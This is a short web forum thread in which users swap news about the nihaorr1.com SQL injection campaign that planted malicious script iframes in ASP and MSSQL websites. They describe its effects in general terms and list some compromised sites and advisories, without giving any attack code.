nihaorr1.com ASP virus

[trevHCS]

Spotted a note about a forum being hacked from Granada in the travel section, but it looks like it's hitting rather wide and injecting itself into ASP sites with databases quite a lot.

There's a breakdown on this site (page 2+ is most useful):
Anyone know about nihaorr1

...but essentially if you're running IIS and ASP with MSSQL then this could be quite serious if you don't spot it coming in. According to Slashdot and F-Secure, there could be 500,000 servers affected, although I didn't think 500K people were daft enough to run Windows based servers.

There's a lot of confusing information on this currently as to exactly what it does, but in essence it seems that an encrypted query string or form input hits the site and tries to run an SQL type injection attack against the database. Due to the encryption and problems with ASP and MSSQL this isn't too easy to spot, so it effectively finds all the TEXT fields and adds some J/script code to those - presuambly on the assumption that some of them will be outputted to the screen.

The output is a series of J/script based iFrames which install a trojan on the users computer, which then tries to attack web sites with this virus. A bit like when that virus hit lots of PHPBB boards. Unfortunately like that one, it runs and pottentially hits very hard but doesn't seem to use Google to do the attacks. Presumably it only runs when it finds an ASP site to send it's injection by GET or POST.

It also seems it uses known problems with MSSQL and ASP to get in and do it's work so doesn't currently hit LAMP systems. I don't understand all the technical stuff about exactly how it gets in, but from what I can see it gets past quite a few security features so even having permissions on the tables might not always protect.

A few more bits on it:
Microsoft Security Advisory (951306): Vulnerability in Windows Could Allow Elevation of Privilege
Slashdot | 500 Thousand MS Web Servers Hacked


Final aim of this seems to be something to do with the Olympics in China, but it could easily be altered to destroy things with a DROP or TERMINATE, or of course just fill the tables with all kinds of illegal stuff. Just depends who gets hold of it.

Trev - running everything on LAMP

[John Jupp]

Virus Threat

I have answered it here. It's a SQL injection. No cure. Attacking booking, reservation and retail sites, attack emanating from Russia. Warning about this has been removed from the BBC news site. Obviously amassing customer payment details.

[trevHCS]

Looking further into this it appears the code at least one some versions is more related to getting exploits on peoples machines and server exploits as there are ones for AJAX through to Yahoo IM.

A bit worrying when large sites such as these are affected:

http://www.faststream.gov.uk [UK Civil Service]
http://www.n-somerset.gov.uk [UK Local Government]
http://www.umc.org [United Methodist Church]
http://www.oddbins.co.uk [Major UK wine retailer]

...and the classic http://www.safecanada.ca [Canadian National Security].

Most of those won't get too much, but Oddbins could be a real killer. There are quite a few listed on this site:
http://www.dynamoo.com/blog/index.htm

Trev

Edit: Meant to add this to the travel site thread, oh well.

[tbp]

Very interesting post about this below, which explains how it works and what it does:

Anyone know about www.nihaorr1.com/1.js? - IIS.net

[Barry]

Thanks for the heads up.



ta